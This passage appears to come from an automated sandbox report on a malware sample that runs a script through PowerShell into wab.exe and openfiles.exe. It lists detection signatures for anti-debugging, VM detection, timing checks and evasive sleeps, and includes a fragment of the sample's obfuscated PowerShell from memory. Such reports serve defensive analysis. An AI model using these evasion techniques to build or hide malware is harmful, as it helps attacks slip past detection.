Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2028D1C0 rdtsc 12_2_2028D1C0
Contains functionality to detect virtual machines (SLDT)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FF887993BFB sldt word ptr [eax] 3_2_00007FF887993BFB
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3943 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5893 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5353 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4377 Jump to behavior
Found large amount of non-executed APIs
Source: C:\Program Files (x86)\Windows Mail\wab.exe API coverage: 0.3 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\wscript.exe TID: 6248 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 748 Thread sleep time: -5534023222112862s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5916 Thread sleep count: 5353 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5916 Thread sleep count: 4377 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4324 Thread sleep time: -5534023222112862s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe TID: 1668 Thread sleep time: -30000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\openfiles.exe Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: wscript.exe, 00000000.00000003.1587636884.0000023238D46000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}.O
Source: wscript.exe, 00000000.00000003.1587421505.0000023238BFD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: wscript.exe, 00000000.00000003.1587421505.0000023238BF7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
Source: wscript.exe, 00000000.00000003.1587198761.0000023236DAF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1588971000.0000023236E3A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWp
Source: wscript.exe, 00000000.00000003.1587549677.0000023238C8D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1470442461.0000023238C91000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1471566026.0000023238C8F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1589361392.0000023238CA9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1589286696.0000023238C8D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1479603781.0000023238C8D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1470481390.0000023238C94000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1470823040.0000023238C91000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: wscript.exe, 00000000.00000003.1587421505.0000023238BF7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: a-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}D0t
Source: powershell.exe, 00000003.00000002.2071733404.000001FCF597A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWoc%SystemRoot%\system32\mswsock.dllrevemot vmchaut. UdslNBro zeHollytJuv l.GvestW ecome BrofbunlooCIncarl UdbyiFreere,aglynSpdbrtUdvik ');Standglas249 (Quillaia 'Psal.$,avshR .krieProtopTerroaCoyotiMovabnBej,st promeFlambrS.orvsI for.PrkenHColoneSpindagal.iduns
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Checks if the current process is being debugged
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process queried: DebugPort Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2028D1C0 rdtsc 12_2_2028D1C0
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 9_2_02B8D8BC LdrInitializeThunk,LdrInitializeThunk, 9_2_02B8D8BC
Contains functionality to read the PEB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2020A020 mov eax, dword ptr fs:[00000030h] 12_2_2020A020
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2020C020 mov eax, dword ptr fs:[00000030h] 12_2_2020C020
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202D903E mov eax, dword ptr fs:[00000030h] 12_2_202D903E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202D903E mov eax, dword ptr fs:[00000030h] 12_2_202D903E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202D903E mov eax, dword ptr fs:[00000030h] 12_2_202D903E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202D903E mov eax, dword ptr fs:[00000030h] 12_2_202D903E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2022E016 mov eax, dword ptr fs:[00000030h] 12_2_2022E016
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2022E016 mov eax, dword ptr fs:[00000030h] 12_2_2022E016
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2022E016 mov eax, dword ptr fs:[00000030h] 12_2_2022E016
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2022E016 mov eax, dword ptr fs:[00000030h] 12_2_2022E016
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202E5060 mov eax, dword ptr fs:[00000030h] 12_2_202E5060
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2023C073 mov eax, dword ptr fs:[00000030h] 12_2_2023C073
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20221070 mov eax, dword ptr fs:[00000030h] 12_2_20221070
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20221070 mov ecx, dword ptr fs:[00000030h] 12_2_20221070
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20221070 mov eax, dword ptr fs:[00000030h] 12_2_20221070
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20221070 mov eax, dword ptr fs:[00000030h] 12_2_20221070
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20221070 mov eax, dword ptr fs:[00000030h] 12_2_20221070
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20221070 mov eax, dword ptr fs:[00000030h] 12_2_20221070
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20221070 mov eax, dword ptr fs:[00000030h] 12_2_20221070
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20221070 mov eax, dword ptr fs:[00000030h] 12_2_20221070
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20221070 mov eax, dword ptr fs:[00000030h] 12_2_20221070
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20221070 mov eax, dword ptr fs:[00000030h] 12_2_20221070
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20221070 mov eax, dword ptr fs:[00000030h] 12_2_20221070
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20221070 mov eax, dword ptr fs:[00000030h] 12_2_20221070
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20221070 mov eax, dword ptr fs:[00000030h] 12_2_20221070
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2028D070 mov ecx, dword ptr fs:[00000030h] 12_2_2028D070
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20212050 mov eax, dword ptr fs:[00000030h] 12_2_20212050
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2023B052 mov eax, dword ptr fs:[00000030h] 12_2_2023B052
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202B705E mov ebx, dword ptr fs:[00000030h] 12_2_202B705E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202B705E mov eax, dword ptr fs:[00000030h] 12_2_202B705E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202D60B8 mov eax, dword ptr fs:[00000030h] 12_2_202D60B8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202D60B8 mov ecx, dword ptr fs:[00000030h] 12_2_202D60B8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2021208A mov eax, dword ptr fs:[00000030h] 12_2_2021208A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2020D08D mov eax, dword ptr fs:[00000030h] 12_2_2020D08D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2023D090 mov eax, dword ptr fs:[00000030h] 12_2_2023D090
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2023D090 mov eax, dword ptr fs:[00000030h] 12_2_2023D090
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20215096 mov eax, dword ptr fs:[00000030h] 12_2_20215096
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2024909C mov eax, dword ptr fs:[00000030h] 12_2_2024909C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2020A0E3 mov ecx, dword ptr fs:[00000030h] 12_2_2020A0E3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202350E4 mov eax, dword ptr fs:[00000030h] 12_2_202350E4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202350E4 mov ecx, dword ptr fs:[00000030h] 12_2_202350E4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202180E9 mov eax, dword ptr fs:[00000030h] 12_2_202180E9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2020C0F0 mov eax, dword ptr fs:[00000030h] 12_2_2020C0F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202520F0 mov ecx, dword ptr fs:[00000030h] 12_2_202520F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202270C0 mov eax, dword ptr fs:[00000030h] 12_2_202270C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202270C0 mov ecx, dword ptr fs:[00000030h] 12_2_202270C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202270C0 mov ecx, dword ptr fs:[00000030h] 12_2_202270C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202270C0 mov eax, dword ptr fs:[00000030h] 12_2_202270C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202270C0 mov ecx, dword ptr fs:[00000030h] 12_2_202270C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202270C0 mov ecx, dword ptr fs:[00000030h] 12_2_202270C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202270C0 mov eax, dword ptr fs:[00000030h] 12_2_202270C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202270C0 mov eax, dword ptr fs:[00000030h] 12_2_202270C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202270C0 mov eax, dword ptr fs:[00000030h] 12_2_202270C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202270C0 mov eax, dword ptr fs:[00000030h] 12_2_202270C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202270C0 mov eax, dword ptr fs:[00000030h] 12_2_202270C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202270C0 mov eax, dword ptr fs:[00000030h] 12_2_202270C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202270C0 mov eax, dword ptr fs:[00000030h] 12_2_202270C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202270C0 mov eax, dword ptr fs:[00000030h] 12_2_202270C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202270C0 mov eax, dword ptr fs:[00000030h] 12_2_202270C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202270C0 mov eax, dword ptr fs:[00000030h] 12_2_202270C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202270C0 mov eax, dword ptr fs:[00000030h] 12_2_202270C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202270C0 mov eax, dword ptr fs:[00000030h] 12_2_202270C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2028D0C0 mov eax, dword ptr fs:[00000030h] 12_2_2028D0C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2028D0C0 mov eax, dword ptr fs:[00000030h] 12_2_2028D0C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202920DE mov eax, dword ptr fs:[00000030h] 12_2_202920DE
